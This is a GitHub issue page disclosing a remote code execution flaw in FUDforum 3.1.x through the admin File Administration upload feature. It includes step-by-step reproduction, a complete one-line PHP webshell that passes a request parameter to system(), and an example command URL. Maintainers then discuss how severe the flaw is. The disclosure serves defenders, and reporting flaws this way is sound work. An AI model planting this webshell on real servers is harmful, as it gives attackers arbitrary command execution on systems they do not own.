Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remote code execution bug #23

Open
SonNguyen3496 opened this issue May 10, 2022 · 3 comments
Open

Remote code execution bug #23

SonNguyen3496 opened this issue May 10, 2022 · 3 comments

Comments

@SonNguyen3496
Copy link

SonNguyen3496 commented May 10, 2022

Remote code execution with File Administration System feature in Admin Control Panel Site

Affected Version- 3.1.0

Demo installation: https://localhost/FUDforum-3.1.2/

Steps to reproduce the bug:
1 : go to http://localhost/FUDforum-3.1.2/ and login with admin account

Screenshot 2022-05-15 at 18 25 26

2 : go to Admin Control panel and access to http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119
Screenshot 2022-05-15 at 18 25 37

3 : Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory
WebShell payload:<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Screenshot 2022-05-15 at 18 32 58

4 : Access to webshell and get remote execution code.
Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la
Screenshot 2022-05-15 at 18 32 46

@babywofl666
Copy link

Confirm that is Critical impact !

@naudefj
Copy link
Collaborator

naudefj commented May 11, 2022

It needs to be fixed, but it's not critical, as it requires admin access.

@SonNguyen3496
Copy link
Author

Agree with u

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants